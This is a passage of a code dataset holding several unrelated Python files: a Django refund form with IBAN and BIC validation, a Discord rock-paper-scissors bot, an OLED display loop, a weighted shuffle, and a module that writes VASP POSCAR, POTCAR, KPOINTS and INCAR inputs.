\"department_leader\",\n \"cost_centre\",\n \"project\",\n \"refund_type\",\n \"bank_account_owner\",\n \"bank_account_iban\",\n \"bank_account_bic\"\n ]\n\n for i in range(10):\n fields.append(\"receipt_{}_picture\".format(i))\n fields.append(\"receipt_{}_amount\".format(i))\n\n localized_fields = \"__all__\"\n\n def disable(self):\n \"\"\"Make all fields disabled (=read-only).\"\"\"\n for _, field in self.fields.items():\n field.disabled = True\n\n def clean(self):\n \"\"\"Clean and validate the form data.\"\"\"\n data = super().clean()\n\n # When `bank account` is chosen as refund type, three additional fields must be validated:\n # Bank account owner, IBAN and BIC.\n if data.get(\"refund_type\") == \"bank_account\":\n if not data.get(\"bank_account_owner\"):\n self.add_error(\"bank_account_owner\", _(\"This field is required.\"))\n\n if data.get(\"bank_account_iban\"):\n iban_validator = IBANValidator()\n try:\n iban_validator(data.get(\"bank_account_iban\"))\n except ValidationError:\n self.add_error(\"bank_account_iban\", _(\"A valid IBAN is required.\"))\n else:\n self.add_error(\"bank_account_iban\", _(\"This field is required.\"))\n\n if data.get(\"bank_account_bic\"):\n bic_validator = BICValidator()\n try:\n bic_validator(data.get(\"bank_account_bic\"))\n except ValidationError:\n self.add_error(\"bank_account_bic\", _(\"A valid BIC is required.\"))\n else:\n self.add_error(\"bank_account_bic\", _(\"This field is required.\"))\n\n # Receipt validation\n if not any([data.get(\"receipt_{}_picture\".format(i)) for i in range(10)]):\n self.add_error(\"receipt_0_picture\", _(\"At least one receipt is required.\"))\n\n for i in range(10):\n if data.get(f\"receipt_{i}_picture\") and not data.get(f\"receipt_{i}_amount\"):\n self.add_error(f\"receipt_{i}_picture\",\n _(\"The amount for this receipt is required.\"))\n elif data.get(f\"receipt_{i}_amount\") and not data.get(f\"receipt_{i}_picture\"):\n self.add_error(f\"receipt_{i}_amount\", _(\"The receipt for this amount is required.\"))\n","sub_path":"refund/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"180307603","text":"#put all the fun commands here\n#IMPORTS\nimport discord\n\nfrom discord.ext import commands\n\nimport asyncio\nimport random\n\n#VARIABLES\nOPTIONS = ['Rock!', 'Paper!', 'Scissors!']\n\n\nclass Fun(commands.Cog):\n \"\"\"Fun commands like quick bot responses or simple games. ex: rock paper scissors\"\"\"\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(aliases=[\"rps\"])\n async def rockpaperscissors(self, ctx):\n \"\"\"A nice game of Rock Paper Scissors. - Alias: rps\"\"\"\n VERIFY = False\n member = ctx.author\n await ctx.send('Thinking of my answer ...')\n await asyncio.sleep(0.8)\n await ctx.send('Got it! Awaiting response.')\n MESSAGE = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author)\n RESPONSE = random.randint(0, 2)\n await ctx.send(OPTIONS[RESPONSE])\n await asyncio.sleep(0.6)\n try:\n while True:\n MESSAGE = await self.bot.wait_for('message', check=(lambda message: message.author == ctx.author),\n timeout=30)\n if MESSAGE.content == \"rock\" or MESSAGE.content == \"Rock\" or MESSAGE.content == \"paper\" or MESSAGE.content == \"Paper\" or MESSAGE.content == \"scissors\" or MESSAGE.content == \"Scissors\":\n break\n else:\n await ctx.send(\"That's not an answer you frick. Put in either rock, paper or scissors.\")\n MESSAGE = \" \"\n except asyncio.TimeoutError:\n await ctx.send(f\"{ctx.author.mention} timed out!\")\n return\n if MESSAGE.content == \"rock\" and RESPONSE == 2 or MESSAGE.content == \"Rock\" and RESPONSE == 2:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"paper\" and RESPONSE == 0 or MESSAGE.content == \"Paper\" and RESPONSE == 0:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"scissors\" and RESPONSE == 1 or MESSAGE.content == \"Scissors\" and RESPONSE == 1:\n await ctx.send(\"https://tenor.com/view/the-goon-win-you-won-willy-wonka-oompa-loompa-fc-gif-14046847\")\n elif MESSAGE.content == \"rock\" and RESPONSE == 0 or MESSAGE.content == \"Rock\" and RESPONSE == 0:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n elif MESSAGE.content == \"paper\" and RESPONSE == 1 or MESSAGE.content == \"Paper\" and RESPONSE == 1:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n elif MESSAGE.content == \"scissors\" and RESPONSE == 2 or MESSAGE.content == \"Scissors\" and RESPONSE == 2:\n await ctx.send(\"https://tenor.com/view/monty-python-draw-gif-5447899\")\n else:\n await ctx.send(\"https://tenor.com/view/you-lose-good-day-sir-gif-7465431\")\n\n\ndef setup(bot):\n bot.add_cog(Fun(bot))\n","sub_path":"src/fullyautomatednutcracker/cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"181755661","text":"import time\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_SSD1306\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nimport subprocess\nRST = None\nDC = 23\nSPI_PORT = 0\nSPI_DEVICE = 0\n\n# 128x32 display with hardware I2C:\ndisp = Adafruit_SSD1306.SSD1306_128_32(rst=RST)\ndisp.begin()\n# Clear display.\ndisp.clear()\ndisp.display()\nwidth = disp.width\nheight = disp.height\nimage = Image.new('1', (width, height))\ndraw = ImageDraw.Draw(image)\ndraw.rectangle((0,0,width,height), outline=0, fill=0)\npadding = 0\ntop = padding\nbottom = height-padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n# Load default font.\nfont = ImageFont.load_default()\n# Alternatively load a TTF font. Make sure the .ttf font file is in the same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\n#font = ImageFont.truetype('Mario-Kart-DS.ttf', 24)\nwhile True:\n draw.rectangle((0,0,width,height), outline=0, fill=0)\n draw.text((x, top + 8), \"Scan Card\", font=font, fill=255)\n disp.image(image)\n disp.display()\n time.sleep(.1)\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"623911050","text":"# O(N^2) time\n# O(N) space\n#\n# Fisher–Yates shuffle\n\nfrom itertools import accumulate\nfrom random import randint\nfrom bisect import bisect\n\ndef shuffle(A, W):\n acc = list(accumulate(W))\n for i in range(len(A)-1, 0, -1): # i is the index so far not shuffled\n rand = randint(0, acc[-1])\n j = min(bisect(acc, rand), len(A)-1) # rand in which range, we get this position element\n A[i], A[j] = A[j], A[i]\n W[i], W[j] = W[j], W[i] # swap 2 item, index >= i is shuffled array\n acc[j:] = [cum-W[i] for cum in acc[j+1:]] # update accumulate array, remove w[i], from acc[j+1]-W[i]\n return A\n\nA = ['a', 'b', 'c', 'd']\nW = [10, 20, 50, 5] # [10, 30, 80, 85]\nprint(shuffle(A, W))\n\n\ndef shuffle(A):\n acc = list(accumulate([weight for _, weight in A]))\n for i in range(len(A)-1, 0, -1):\n rand = randint(0, acc[-1])\n j = min(bisect(acc, rand), len(A)-1)\n A[i], A[j] = A[j], A[i]\n acc[j:] = [cum - A[i][1] for cum in acc[j+1:]]\n return A\n\nA = [('A', 30), (\"B\", 5), (\"C\", 20)]\nprint(shuffle(A))\n\n# no weight\ndef randomize (arr, n):\n # Start from the last element and swap one by one. We don't\n # need to run for the first element that's why i > 0\n for i in range(n-1,0,-1):\n j = randint(0,i)\n arr[i],arr[j] = arr[j],arr[i]\n return arr\n","sub_path":"Google/shuffle_weighted_array.py","file_name":"shuffle_weighted_array.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"461286205","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module handles VASP Files\ninputを作成するIncar, Posca, Potcar, Kpoints\noutputを読むOszicar, Outcar\n\"\"\"\nfrom __future__ import print_function\n# from __future__ import unicode_literals\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import generators\n# import sys\n# if sys.version < '3':\n# text_type = unicode\n# binary_type = str\n# else:\n# text_type = str\n# binary_type = bytes\n\n\nimport os\nimport re\nimport math\nimport copy\nimport numpy as np\nimport solid\nfrom commopy import Cabinet, Vector, Bash\n\n#================================Gloval Values================================#\nMODULE_DIR = os.path.dirname(os.path.abspath(__file__))\n#================================Gloval Values================================#\n\n\ndef main():\n \"\"\"\n Execute MakeInputs.all() at current directory.\n \"\"\"\n MakeInputs.all('.')\n\n\nclass Poscar(object):\n \"\"\"\n This class manages VASP POSCAR file.\n elements: elements_list\n num_atoms: num of elements_list\n cell_lattices: lattice parameters 3 * 3 array\n cell_deg\n Correspondece only vasp 5\n Noneを引数にいれるとtemplateファイルを読んでobjを作成する\n 引数poscarはlist型のlinesにも対応\n \"\"\"\n def __init__(self, poscar='POSCAR'):\n if type(poscar) is str:\n try:\n poscar_lines = Cabinet.read_file(poscar)\n except IOError:\n print(\"error: vaspy.Poscar could not \"\n \"find '{0}' file !!!\".format(poscar))\n exit()\n elif type(poscar) is list:\n poscar_lines = poscar\n elif poscar is None:\n print(\"POSCAR was not read !!! (Template POSCAR is loaded !!!)\")\n poscar = os.path.join(MODULE_DIR,\n '../sorce/originalsVASP', 'poscar')\n poscar_lines = Cabinet.read_file(poscar)\n self.poscar_title = poscar_lines[0]\n self.cell_scale = float(poscar_lines[1])\n self.cell_lattices = Cabinet.conv_lines2array(poscar_lines[2:5])\n # self.cell_latticesはarrayとして読み込む\n if poscar_lines[5].split()[0].isdigit(): # vasp4\n self.elements = None\n self.num_atoms = [int(x) for x in poscar_lines[5].split()]\n i = sum(self.num_atoms)\n self.cell_sites = Cabinet.conv_lines2array(poscar_lines[7:7+i])\n self.vasp_version = 4\n else:\n self.elements = poscar_lines[5].split() # vasp5\n self.num_atoms = [int(x) for x in poscar_lines[6].split()]\n i = sum(self.num_atoms)\n self.cell_sites = Cabinet.conv_lines2array(poscar_lines[8:8+i])\n self.vasp_version = 5\n\n def __str__(self):\n lines = self.poscar_title\n lines += \" {0:.16f}\\n\".format(self.cell_scale)\n for latt in self.cell_lattices:\n lines += \" {0[0]:.16f} {0[1]:.16f} {0[2]:.16f}\\n\".format(latt)\n lines += \" {0}\\n\".format(\" \".join(self.elements))\n num_atoms = [str(x) for x in self.num_atoms]\n lines += \" {0}\\n\".format(\" \".join(num_atoms))\n lines += \"Direct\\n\"\n for site in self.cell_sites:\n lines += \" {0[0]:.16f} {0[1]:.16f} {0[2]:.16f}\\n\".format(site)\n return lines\n\n def get_atom_fractions(self):\n \"\"\"atomの分率をreturn\"\"\"\n sum_atoms = float(sum(self.num_atoms))\n fractions = [x / sum_atoms for x in self.num_atoms]\n return fractions\n\n def get_cell_volume(self):\n \"\"\"\n Return cell volume\n \"\"\"\n volume = Vector.get_volume(*self.cell_lattices) * self.cell_scale ** 3\n return volume\n\n def get_lattice_length(self):\n \"\"\"\n Return lattice parameters read from POSCAR\n lattices = [a, b, c]\n \"\"\"\n lattices = []\n for latt in self.cell_lattices:\n length = np.linalg.norm(latt) * self.cell_scale\n lattices.append(length)\n return lattices\n\n def get_cell_angle(self):\n \"\"\"\n return lattices angle of unit cell in degree.\n \"\"\"\n gamma = (self.cell_lattices[0], self.cell_lattices[1])\n alpha = (self.cell_lattices[1], self.cell_lattices[2])\n beta = (self.cell_lattices[2], self.cell_lattices[0])\n angles = [Vector.get_angle(x, y) for x, y in (alpha, beta, gamma)]\n return angles\n\n def alt_c_over_a(self, c_over_a):\n \"\"\"\n This method change C over A with fixed cell_volume and B-axis.\n normalize_latticeからnormalize\n c/aはこのときlen_c/cell_scaleとなる\n \"\"\"\n self.normalize_lattice()\n len_c = self.get_lattice_length()[2]\n prev = len_c / self.cell_scale\n self.cell_lattices[2] *= c_over_a / prev\n self.cell_scale /= (c_over_a / prev) ** (1./3)\n print(\"Previous c/a of {} have changed to {}\".format(prev, c_over_a))\n\n def alt_cell_scale(self, scale):\n \"\"\"\n Alt cell_scale parameter\n \"\"\"\n self.cell_scale = scale\n\n def alt_cell_volume(self, volume):\n \"\"\"\n Alt cell_volume\n \"\"\"\n ratio = volume / self.get_cell_volume()\n self.cell_scale *= (ratio) ** (1./3.)\n\n def normalize_lattice(self):\n \"\"\"\n a軸の記述を1, 0, 0に規格化する\n 暫定的に作ったので値のチェックが別途必要\n \"\"\"\n scale = self.get_lattice_length()[0]\n length = self.get_lattice_length()\n angle = self.get_cell_angle()\n\n cos_a, cos_b, cos_g = (math.cos(math.radians(x)) for x in angle)\n sin_g = math.sin(math.radians(angle[2]))\n\n cos_phi = (cos_a - cos_b * cos_g) / sin_g\n cos_theta = ((sin_g ** 2 - cos_a ** 2 - cos_b ** 2 +\n 2 * cos_a * cos_b * cos_g) ** 0.5) / sin_g\n\n vec_a = [1, 0, 0]\n vec_b = [cos_g, sin_g, 0]\n vec_c = [cos_b, cos_phi, cos_theta]\n\n self.cell_lattices[0] = vec_a\n self.cell_lattices[1] = vec_b\n self.cell_lattices[2] = vec_c\n\n self.cell_scale = scale\n self.cell_lattices[0] *= length[0] / scale\n self.cell_lattices[1] *= length[1] / scale\n self.cell_lattices[2] *= length[2] / scale\n\n def write_poscar(self, poscar='POSCAR'):\n \"\"\"\n write_poscar(path)\n Make a 'POSCAR' file at 'path'\n \"\"\"\n Cabinet.reserve_file(poscar)\n Cabinet.write_file(poscar, str(self))\n\n\nclass Potcar(object):\n \"\"\"\n This class manages potcar files.\n \"\"\"\n VASP_POT_DIR = os.environ.get('VASP_POTPAW', '')\n\n def __init__(self, elements=None):\n \"\"\"\n Make POTCAR to the 'path' directory.\n pot_lines_list\n Get and set the encut, and rwigs values.\n \"\"\"\n self.psuedo_pot = self.get_psuedo_pot(elements)\n self.potentials_lines = self.read_potcar()\n\n def read_potcar(self):\n \"\"\"\n Several POTCAR files lines are loaded based on self.psuedo_pot list.\n \"\"\"\n path_list = [os.path.join(self.VASP_POT_DIR, x, 'POTCAR')\n for x in self.psuedo_pot]\n potentials_lines = [Cabinet.read_file(x) for x in path_list]\n return potentials_lines\n\n @staticmethod\n def get_psuedo_pot(elements):\n \"\"\"\n Make psuedo_pot list from POT_DICT.\n \"\"\"\n psuedo_pot = [solid.POT_DICT[x] for x in elements]\n return psuedo_pot\n\n def read_rwigs(self):\n \"\"\"\n Read rwigs from POTCAR lines\n \"\"\"\n rwigs = []\n for p_lines in self.potentials_lines:\n keywords = r\"\\s*RWIGS\\s*=\\s*[\\d.]+\\s*;\\s*RWIGS\\s*=\\s*([\\d.]+)\\s*.*\"\n meta = re.compile(keywords)\n lines_iter = iter(p_lines)\n line = next(lines_iter)\n while meta.match(line) is None:\n line = next(lines_iter)\n match_line = meta.match(line)\n rwigs.append(match_line.group(1))\n return rwigs\n\n def read_encut(self):\n \"\"\"\n Read encut from POTCAR lines\n \"\"\"\n encut_list = []\n for p_lines in self.potentials_lines:\n keywords = r\"\\s*ENMAX\\s*=\\s*([\\d.]+)\\s*;\\s*ENMIN\\s*=\\s*[\\d.]+\\s*.*\"\n meta = re.compile(keywords)\n lines_iter = iter(p_lines)\n line = next(lines_iter)\n while meta.match(line) is None:\n line = next(lines_iter)\n match_line = meta.match(line)\n encut_list.append(float(match_line.group(1)))\n encut = max(encut_list)\n return encut, encut_list\n\n def write_potcar(self, path, fname='POTCAR'):\n \"\"\"\n Make a combined single POTCAR file\n \"\"\"\n fname = os.path.join(path, fname)\n out_lines = [x for y in self.potentials_lines for x in y]\n Cabinet.write_file(fname, out_lines)\n\n @staticmethod\n def get_composition(fname='./POTCAR'):\n \"\"\"\n POTCARから元素を読む\n PAW_PBEから始まる行に元素名が記載されているのでそこを読む\n 空行は例外処理でpassする\n \"\"\"\n lines = Cabinet.read_file(fname)\n elements = []\n for line in lines:\n try:\n if line.split()[0] == 'PAW_PBE':\n elements.append(line.split()[1].split('_')[0])\n except IndexError:\n pass\n return elements\n\n\nclass Kpoints(object):\n \"\"\"This class manages KPOINTS file.\"\"\"\n def __init__(self, cell_lattices, dq, is_odd=True):\n \"\"\"Set self.kpoints\"\"\"\n q_vector = [2*math.pi/x for x in cell_lattices]\n kpoints = [int(round(x / dq)) for x in q_vector]\n kpoints_odd = [x + (1 - x % 2) for x in kpoints]\n self.kpoints = {True: kpoints_odd, False: kpoints}.get(is_odd)\n\n def alt_odd(self):\n \"\"\"This attr. changes self.kpoints to odd_number\"\"\"\n self.kpoints = [x + (1 - x % 2) for x in self.kpoints]\n\n def alt_size(self, var):\n \"\"\"Each kpoints times var \"\"\"\n self.kpoints = [int(x * var) for x in self.kpoints]\n\n def write_kpoints(self, fname='KPOINTS'):\n \"\"\"Write KPOINTS file using self.kpoints\"\"\"\n kp_lines = ('Automatic mesh\\n0\\nMonkhorst Pack\\n'\n ' {0[0]} {0[1]} {0[2]}\\n 0. 0. 0.\\n'\n .format(self.kpoints))\n Cabinet.write_file(fname, kp_lines)\n\n\nclass IncarReadWriteMixin(object):\n \"\"\"Read & Write INCAR file methods\"\"\"\n @classmethod\n def read_incar(cls, fname):\n \"\"\"\n Read a Incar file, and make a incar_dict.\n \"\"\"\n lines = Cabinet.read_file(fname)\n incar_dict = {}\n for line in lines:\n if line[0] not in ('#', '\\n'):\n para_list = line.split('#')[0].split('!')[0]\n # ^ remove comment_out ^\n para_list = para_list.split()\n key = para_list[0].lower()\n value_list = para_list[2:]\n incar_dict.update({key: value_list})\n cls.__fix_dict(incar_dict)\n return incar_dict\n\n @staticmethod\n def __fix_dict(incar_dict):\n \"\"\"\n 読み込んだincar_dictをintやfloat形式に修正\n \"\"\"\n for key, value in incar_dict.items():\n if len(value) > 1:\n fixed_val = [Cabinet.conv_str(x) for x in value]\n else:\n fixed_val = Cabinet.conv_str(value[0])\n if fixed_val == '.TRUE.':\n fixed_val = True\n elif fixed_val == '.FALSE.':\n fixed_val = False\n incar_dict.update({key: fixed_val})\n\n def make_incform_all(self):\n \"\"\"Make INCAR lines into dict.\"\"\"\n incar_lines = {}\n for key in self.incar_out_list:\n incar_lines.update({key: self.make_incform(key)})\n return incar_lines\n\n def make_incform(self, key):\n \"\"\"Change valuables into INCAR format.\"\"\"\n try:\n var = self.incar_dict[key]\n except KeyError:\n var = None\n if isinstance(var, list):\n var = [str(x) for x in var]\n line = \"{0} = {1}\\n\".format(key.upper(), \" \".join(var))\n return line\n if isinstance(var, bool):\n true = \"{0} = {1}\\n\".format(key.upper(), \".TRUE.\")\n false = \"{0} = {1}\\n\".format(key.upper(), \".FALSE.\")\n line = {True: true, False: false}.get(var)\n return line\n if isinstance(var, (int, str)):\n line = \"{0} = {1}\\n\".format(key.upper(), var)\n return line\n if isinstance(var, (float)):\n line = \"{0} = {1}\\n\".format(key.upper(), var)\n return line\n if isinstance(var, type(None)):\n line = \"\\n\"\n return line\n\n def update(self, extra_dict):\n \"\"\"\n incar_dictをself.updateで要素追加\n __setitem__中に定義したが、\n keyがincar_out_listになければkeyを追加\n \"\"\"\n for key in extra_dict:\n self[key] = extra_dict[key]\n\n def __getitem__(self, key):\n return self.incar_dict[key]\n\n def __setitem__(self, key, var):\n self.incar_dict[key] = var\n if not key in self.incar_out_list:\n self.incar_out_list.append(key)\n\n def __str__(self):\n \"\"\"\n fixed_tagをupdateしてINCARのformatでreturn\n \"\"\"\n self.update(self.cls_fixed_tag)\n self.update(self.fixed_tag)\n lines_dict = self.make_incform_all()\n lines = \"\"\n for key in self.incar_out_list:\n lines += lines_dict[key]\n while lines.count('\\n\\n\\n') != 0:\n lines = lines.replace('\\n\\n\\n', '\\n\\n')\n return lines\n\n def write_incar(self, fname):\n \"\"\"Write INCAR file\"\"\"\n Cabinet.write_file(fname, str(self))\n\n\nclass IncarSwitchTagsMixin(IncarReadWriteMixin):\n \"\"\"\n INCARのtagをSwichによって切り替える\n またIncar_objを呼ぶ前にtagを追加しておきたい場合、\n cls_add* methodsを利用する\n 初期化するときはcls_initializeを使う\n with exit構文で利用できるように整理したい\n \"\"\"\n @classmethod\n def cls_add_extratag(cls, extra_tag):\n \"\"\"\n extra_tagを変更\n 最初に読み込むのでENCUTなどは適宜INCARで変更される\n \"\"\"\n cls.cls_extra_tag.update(extra_tag)\n\n @classmethod\n def cls_add_fixedtag(cls, fixed_tag):\n \"\"\"\n fixed_tagを変更\n 最後に読み込むので作成されるINCARで全て共通になる\n \"\"\"\n cls.cls_fixed_tag.update(fixed_tag)\n\n @classmethod\n def cls_initialize(cls):\n \"\"\"\n classを初期化する\n \"\"\"\n cls.cls_fixed_tag = {}\n cls.cls_extra_tag = {}\n\n def switch_istart_lwave(self, read_sw=False, write_sw=False):\n \"\"\"\n Set istart, icharg, lwave, lcharg.\n -No read and No write (F, F) use cell relaxation, ibzkp calculation.\n -Read and No write (T, F) use for\n spin orbit and band structure calculations.\n -No read and write (F, T) use for\n pre-spin orbit calculations (spin polarized) and pre-band calculation\n \"\"\"\n read_dict = {True: {'istart': 1, 'icharg': 11},\n False: {'istart': 0, 'icharg': 2}}\n write_dict = {True: {'lwave': True, 'lcharg': True},\n False: {'lwave': False, 'lcharg': False}}\n self.update(read_dict[read_sw])\n self.update(write_dict[write_sw])\n\n def switch_magnetic(self, mag_sw=True):\n \"\"\"\n 磁性計算と非磁性計算の切り替え\n \"\"\"\n mag_dict = {True: {'ispin': 2}, False: {'ispin': 1, 'magmom': None}}\n self.update(mag_dict[mag_sw])\n\n def switch_relax_stracture(self, relax_sw=False, isif=3):\n \"\"\"\n 構造緩和計���を行うかどうかの切り替え\n nsw=10とediffg=-0.005がdefault値\n 振動してしまってなかなか収束しない\n 0.005は結構厳しいのかもしれない...\n directに緩和させる場合はefiffgを整数(default値)にして\n volume依存性から求める場合はediffgを-0.01に変更した\n\n ibrionを2に、encutを1.3倍に変更する\n \"\"\"\n relax_dict = {True: {'encut': self.incar_dict['encut'] * 1.3,\n 'ibrion': 2, 'nsw': 10, 'isif': isif,\n 'ediffg': -0.01},\n False: {'ibrion': None, 'nsw': None, 'isif': None,\n 'ediffg': None}}\n self.update(relax_dict[relax_sw])\n\n def switch_mae_calc_condition(self, mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=None):\n \"\"\"\n MAE計算の為のswich\n mae_sw=Trueの場合isymなどを0に指定\n \"\"\"\n mae_dict = {True: {'gga_compat': False, 'lmaxmix': lmaxmix,\n 'isym': 0, 'ediff': 1.0e-5},\n False: {'gga_compat': None, 'lmaxmix': None,\n 'isym': None, 'ediff': None}}\n magmom = self.incar_dict['magmom']\n soc_dict = {True: {'lsorbit': True, 'magmom': None, 'saxis': saxis,\n 'ediff': 1.0e-6},\n False: {'lsorbit': False, 'magmom': magmom, 'saxis': None}}\n self.update(mae_dict[mae_sw])\n self.update(soc_dict[soc_sw])\n\n\nclass IncarLoadPoscarObj(IncarSwitchTagsMixin):\n \"\"\"\n Correct parameters from Poscar_object (and Potcar).\n \"\"\"\n cls_extra_tag = {}\n cls_fixed_tag = {}\n incar_out_list = ['system', 's',\n 'npar', 'prec', 'encut', 's',\n 'ispin', 'magmom', 'lsorbit', 'saxis', 's',\n 'gga_compat', 'lmaxmix', 'isym', 's',\n 'nelm', 'nelmin', 'ediff',\n 'ismear', 'sigma', 's',\n 'ibrion', 'nsw', 'isif', 'ediffg', 's',\n 'istart', 'icharg', 'lwave', 'lcharg',\n 'lorbit', 's',\n 'rwigs']\n\n def __init__(self, poscar_obj):\n self.elements = poscar_obj.elements\n self.num_atoms = poscar_obj.num_atoms\n potcar = Potcar(self.elements)\n self.incar_dict = {}\n self.update({'rwigs': potcar.read_rwigs()})\n self.update({'encut': potcar.read_encut()[0]})\n self.update({'system': self.get_formula()})\n self.update({'magmom': self.make_magmom()})\n\n self.update({'npar': 1})\n self.update({'prec': 'Accurate'})\n self.update({'ispin': 2})\n self.update(self.cls_extra_tag)\n self.fixed_tag = {}\n\n def get_formula(self):\n \"\"\"\n Get system name as a chemical formular.\n \"\"\"\n formula = \"\"\n for element, num in zip(self.elements, self.num_atoms):\n if num == 1:\n num = ''\n formula += \"{0}{1}\".format(element, num)\n return formula\n\n def make_magmom(self, mag=3):\n \"\"\"Make magmom from num_atoms.\"\"\"\n magmom = [mag for y in self.num_atoms for x in range(0, y)]\n return magmom\n\n\nclass IncarReadPoscar(IncarLoadPoscarObj):\n \"\"\"\n Correct parameters from Poscar file (and Potcar).\n \"\"\"\n def __init__(self, poscar='POSCAR'):\n poscar_obj = Poscar(poscar)\n IncarLoadPoscarObj.__init__(self, poscar_obj)\n\n\nclass MakeInputs(object):\n \"\"\"Make inputs file of series\"\"\"\n @classmethod\n def all(cls, path, incar_obj=None, kp_rx=0.15, kp_soc=0.11):\n \"\"\"\n All pattern of INCAR files are prepared.\n それぞれのパラメータの変更は\n class method \"cls_add_fixedtag\"や\"cls_add_extratag\"を使うか\n incar_objに書き替えたincarを入力\n 省略した場合、path中のPOSCARをbaseに作成\n \"\"\"\n if not incar_obj:\n incar_obj = IncarReadPoscar(os.path.join(path, 'POSCAR'))\n cls.make_potcar_kpoints(path, kp_rx, kp_soc)\n methods = ['relax', 'cell', 'volume', 'volumeE', 'presoc', 'presoc_nc',\n 'ibzkp', 'soc',\n 'dos', 'band', 'static']\n for method in methods:\n getattr(cls, method)(path, incar_obj)\n src_dir = os.path.join(MODULE_DIR, '../sorce/originalsVASP', 'Calc')\n dst_dir = os.path.join(path, 'Calc')\n Bash.copy_dir(src_dir, dst_dir)\n\n @staticmethod\n def relax(path, base):\n \"\"\"For cell optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=3)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_relax')\n incar.write_incar(fname)\n\n @staticmethod\n def cell(path, base):\n \"\"\"For cell optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=4)\n incar['encut'] /= 1.3\n incar['isym'] = 0\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_cell')\n incar.write_incar(fname)\n\n @staticmethod\n def volume(path, base):\n \"\"\"For volume optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_volume')\n incar.write_incar(fname)\n\n @staticmethod\n def volumeE(path, base): #pylint: disable=C0103\n \"\"\"For volume optimize calculation\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n del incar.incar_dict['ediffg']\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n fname = os.path.join(path, 'INCAR_volumeE')\n incar.write_incar(fname)\n\n @staticmethod\n def cell_nonmag(path, base):\n \"\"\"For cell optimize calculation with nonmag ver.\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=3)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_magnetic(False)\n fname = os.path.join(path, 'INCAR_cell_nonmag')\n incar.write_incar(fname)\n\n @staticmethod\n def volume_nonmag(path, base):\n \"\"\"For volume optimize calculation with nonmag ver.\"\"\"\n incar = copy.deepcopy(base)\n incar.switch_relax_stracture(relax_sw=True, isif=7)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_magnetic(False)\n fname = os.path.join(path, 'INCAR_volume_nonmag')\n incar.write_incar(fname)\n\n @staticmethod\n def presoc(path, base):\n \"\"\"\n For spin-polarized calculation to generate WAVECAR and CHGCAR\n for non-self consistent soc calculations.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'ismear': -5})\n fname = os.path.join(path, 'INCAR_presoc')\n incar.write_incar(fname)\n\n @staticmethod\n def ibzkp(path, base):\n \"\"\"\n Make IBZKP file from 1 iteration calculation of soc condition.\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=False)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4,\n soc_sw=True, saxis=[1, 0, 0])\n incar.incar_dict.update({'nelm': 1})\n incar.incar_dict.update({'nelmin': 1})\n incar.incar_dict.update({'ismear': -5})\n fname = os.path.join(path, 'INCAR_ibzkp')\n incar.write_incar(fname)\n\n @staticmethod\n def presoc_nc(path, base):\n \"\"\"\n Noncollinear caluculation to generate WACECAR and CHGCAR\n for non-self consistent soc calculation.\n 見やすくするためmagmomはstrで作成\n \"\"\"\n incar = copy.deepcopy(base)\n incar.switch_istart_lwave(read_sw=False, write_sw=True)\n incar.switch_mae_calc_condition(mae_sw=True, lmaxmix=4, soc_sw=False)\n incar.incar_dict.update({'lnoncollinear': True})\n magmom_tmp = [['0', '0', str(x)] for x in incar.incar_dict['magmom']]\n magmom_3d = \"\"\n for mag in magmom_tmp:\n magmom_3d += \" \".join(mag) + \" \"\n incar.incar_dict.update({'magmom': magmom_3d})\n incar.incar_dict.update({'nelm': 150})\n incar.incar_dict.update({'ismear': -5})\n incar.incar_out_list.append('lnoncollinear')\n fname = os.path.join(path, 'INCAR_presoc_nc')\n incar.write_incar(fname)\n\n @staticmethod\n def soc(path, base):\n \"\"\"\n For soc calculation.\n 